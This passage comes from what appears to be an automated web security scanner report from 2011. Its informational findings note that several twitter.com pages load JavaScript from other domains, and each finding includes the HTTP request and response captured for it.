18.432. http://twitter.com/jayleno previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/jayleno

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296258363/javascripts/geov1.js?1296262534
http://a1.twimg.com/a/1296258363/javascripts/api.js?1296262534
http://a1.twimg.com/a/1296258363/javascripts/lib/gears_init.js?1296262534
http://a2.twimg.com/a/1296258363/javascripts/lib/jquery.tipsy.min.js?1296262534
http://a2.twimg.com/a/1296258363/javascripts/lib/mustache.js?1296262534
http://a3.twimg.com/a/1296258363/javascripts/dismissable.js?1296262534
http://a3.twimg.com/a/1296258363/javascripts/twitter.js?1296262534
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

Response

HTTP/1.0 200 OK
Date: Sat, 29 Jan 2011 01:52:55 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296265975-96833-20443
ETag: "f04375a0a64efa284a42025451fab18b"
Last-Modified: Sat, 29 Jan 2011 01:52:55 GMT
X-Runtime: 0.01621
Content-Type: text/html; charset=utf-8
Content-Length: 52179
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296258363/javascripts/twitter.js?1296262534" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296258363/javascripts/lib/jquery.tipsy.min.js?1296262534" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a1.twimg.com/a/1296258363/javascripts/lib/gears_init.js?1296262534" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296258363/javascripts/lib/mustache.js?1296262534" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296258363/javascripts/geov1.js?1296262534" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296258363/javascripts/api.js?1296262534" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296258363/javascripts/lib/mustache.js?1296262534" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296258363/javascripts/dismissable.js?1296262534" type="text/javascript"></script>
...[SNIP]...

18.433. http://twitter.com/jbchang previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/jbchang

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296245718/javascripts/geov1.js?1296247836
http://a1.twimg.com/a/1296245718/javascripts/api.js?1296247836
http://a1.twimg.com/a/1296245718/javascripts/lib/gears_init.js?1296247836
http://a2.twimg.com/a/1296245718/javascripts/lib/jquery.tipsy.min.js?1296247836
http://a2.twimg.com/a/1296245718/javascripts/lib/mustache.js?1296247836
http://a3.twimg.com/a/1296245718/javascripts/dismissable.js?1296247836
http://a3.twimg.com/a/1296245718/javascripts/twitter.js?1296247836
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

Response

HTTP/1.0 200 OK
Date: Sat, 29 Jan 2011 01:50:33 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296265833-44616-32351
ETag: "48cc8fb365481ae35c75282f1de941fe"
Last-Modified: Sat, 29 Jan 2011 01:50:33 GMT
X-Runtime: 0.02514
Content-Type: text/html; charset=utf-8
Content-Length: 50548
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296245718/javascripts/twitter.js?1296247836" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296245718/javascripts/lib/jquery.tipsy.min.js?1296247836" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a1.twimg.com/a/1296245718/javascripts/lib/gears_init.js?1296247836" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296245718/javascripts/lib/mustache.js?1296247836" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296245718/javascripts/geov1.js?1296247836" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296245718/javascripts/api.js?1296247836" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a2.twimg.com/a/1296245718/javascripts/lib/mustache.js?1296247836" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296245718/javascripts/dismissable.js?1296247836" type="text/javascript"></script>
...[SNIP]...

18.434. http://twitter.com/jobs previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/jobs

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296179758/javascripts/api.js?1296181726
http://a1.twimg.com/a/1296179758/javascripts/layout_newtwitter.js?1296181726
http://a1.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296181726
http://a1.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296181726
http://a2.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181726
http://a2.twimg.com/a/1296179758/javascripts/twitter.js?1296181726
http://a3.twimg.com/a/1296179758/javascripts/geov1.js?1296181726
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.flickr.com/badge_code_v2.gne?count=6&display=latest&size=s&layout=h&source=user&user=34178660@N03
http://www.google.com/jsapi

Request

GET /jobs HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:31:19 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225079-13629-5258
ETag: "24f2b3be58ffd35c950d79aa330616fd"
Last-Modified: Fri, 28 Jan 2011 14:31:19 GMT
X-Runtime: 0.03334
Content-Type: text/html; charset=utf-8
Content-Length: 18757
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CToMY3NyZl9pZCIlZDAwNDA4YmY4ZmE2OWEzNWU4MmQ0MDg5OTkxYmEz%250AMTU6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--b979158e747a489fb5b4a97a6e15537893f77f1a; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
<tr>

<script type="text/javascript" src="http://www.flickr.com/badge_code_v2.gne?count=6&display=latest&size=s&layout=h&source=user&user=34178660@N03"></script>
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/twitter.js?1296181726" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296181726" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296181726" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181726" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/geov1.js?1296181726" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/api.js?1296181726" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/layout_newtwitter.js?1296181726" type="text/javascript"></script>
...[SNIP]...

18.435. http://twitter.com/jobs previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/jobs

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182903
http://a0.twimg.com/a/1296179758/javascripts/twitter.js?1296182903
http://a1.twimg.com/a/1296179758/javascripts/geov1.js?1296182903
http://a2.twimg.com/a/1296179758/javascripts/api.js?1296182903
http://a3.twimg.com/a/1296179758/javascripts/layout_newtwitter.js?1296182903
http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182903
http://a3.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182903
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.flickr.com/badge_code_v2.gne?count=6&display=latest&size=s&layout=h&source=user&user=34178660@N03
http://www.google.com/jsapi

Request

GET /jobs HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 17:12:54 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296234774-64371-2009
ETag: "181158fedebff2659244f22b63e5501d"
Last-Modified: Fri, 28 Jan 2011 17:12:54 GMT
X-Runtime: 0.02183
Content-Type: text/html; charset=utf-8
Content-Length: 18626
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2E6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--1fee8dfc989eabd14b8fe40bb5047ae7f4f0da07; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
<tr>

<script type="text/javascript" src="http://www.flickr.com/badge_code_v2.gne?count=6&display=latest&size=s&layout=h&source=user&user=34178660@N03"></script>
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/twitter.js?1296182903" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182903" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182903" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182903" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/geov1.js?1296182903" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/api.js?1296182903" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/layout_newtwitter.js?1296182903" type="text/javascript"></script>
...[SNIP]...

18.436. http://twitter.com/joedwinell/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/joedwinell/

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296258363/javascripts/dismissable.js?1296263125
http://a0.twimg.com/a/1296258363/javascripts/geov1.js?1296263125
http://a0.twimg.com/a/1296258363/javascripts/twitter.js?1296263125
http://a2.twimg.com/a/1296258363/javascripts/api.js?1296263125
http://a2.twimg.com/a/1296258363/javascripts/lib/gears_init.js?1296263125
http://a3.twimg.com/a/1296258363/javascripts/lib/jquery.tipsy.min.js?1296263125
http://a3.twimg.com/a/1296258363/javascripts/lib/mustache.js?1296263125
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

Response

HTTP/1.0 200 OK
Date: Sat, 29 Jan 2011 01:41:30 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296265290-93276-31294
ETag: "17022c0def3fb9af583820ad4dacfa32"
Last-Modified: Sat, 29 Jan 2011 01:41:30 GMT
X-Runtime: 0.00712
Content-Type: text/html; charset=utf-8
Content-Length: 52042
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296258363/javascripts/twitter.js?1296263125" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296258363/javascripts/lib/jquery.tipsy.min.js?1296263125" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a2.twimg.com/a/1296258363/javascripts/lib/gears_init.js?1296263125" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296258363/javascripts/lib/mustache.js?1296263125" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296258363/javascripts/geov1.js?1296263125" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296258363/javascripts/api.js?1296263125" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296258363/javascripts/lib/mustache.js?1296263125" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296258363/javascripts/dismissable.js?1296263125" type="text/javascript"></script>
...[SNIP]...

18.437. http://twitter.com/joemccann previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/joemccann

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182306
http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182306
http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182306
http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296182306
http://a2.twimg.com/a/1296179758/javascripts/dismissable.js?1296182306
http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296182306
http://a3.twimg.com/a/1296179758/javascripts/api.js?1296182306
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

GET /joemccann HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 17:11:25 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296234685-75614-32475
ETag: "164afb0272952f14d229c886c56af368"
Last-Modified: Fri, 28 Jan 2011 17:11:25 GMT
X-Runtime: 0.01834
Content-Type: text/html; charset=utf-8
Content-Length: 50067
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2E6D2NyZWF0ZWRfYXRsKwgzTvDMLQE6B2lkIiUxYzk1MzQ4MWE0MmZkZTlj%250AMGM3NGFlZDU3OTFmMmY2NCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6%250ARmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7AA%253D%253D--e41b589258f43ce00a3c10f5af818420400a35c0; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296182306" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182306" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182306" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182306" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296182306" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/api.js?1296182306" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182306" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/dismissable.js?1296182306" type="text/javascript"></script>
...[SNIP]...

18.438. http://twitter.com/joemccann previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/joemccann

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296179758/javascripts/api.js?1296181726
http://a1.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296181726
http://a1.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296181726
http://a2.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181726
http://a2.twimg.com/a/1296179758/javascripts/twitter.js?1296181726
http://a3.twimg.com/a/1296179758/javascripts/dismissable.js?1296181726
http://a3.twimg.com/a/1296179758/javascripts/geov1.js?1296181726
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

GET /joemccann HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:30:40 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225039-24458-21657
ETag: "2185bda414323413d07c805828e8deaa"
Last-Modified: Fri, 28 Jan 2011 14:30:39 GMT
X-Runtime: 0.01186
Content-Type: text/html; charset=utf-8
Content-Length: 50599
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/twitter.js?1296181726" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296181726" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296181726" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181726" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/geov1.js?1296181726" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/api.js?1296181726" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181726" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/dismissable.js?1296181726" type="text/javascript"></script>
...[SNIP]...

18.439. http://twitter.com/jordanknight previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/jordanknight

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296245718/javascripts/lib/mustache.js?1296248415
http://a1.twimg.com/a/1296245718/javascripts/dismissable.js?1296248415
http://a1.twimg.com/a/1296245718/javascripts/geov1.js?1296248415
http://a1.twimg.com/a/1296245718/javascripts/twitter.js?1296248415
http://a3.twimg.com/a/1296245718/javascripts/api.js?1296248415
http://a3.twimg.com/a/1296245718/javascripts/lib/gears_init.js?1296248415
http://a3.twimg.com/a/1296245718/javascripts/lib/jquery.tipsy.min.js?1296248415
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

Response

HTTP/1.0 200 OK
Date: Sat, 29 Jan 2011 01:52:49 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296265969-53407-37171
ETag: "a1dbaefbdb244bad17317656f8f51eb0"
Last-Modified: Sat, 29 Jan 2011 01:52:49 GMT
X-Runtime: 0.01240
Content-Type: text/html; charset=utf-8
Content-Length: 47864
Pragma: no-cache
X-Revision: DEV
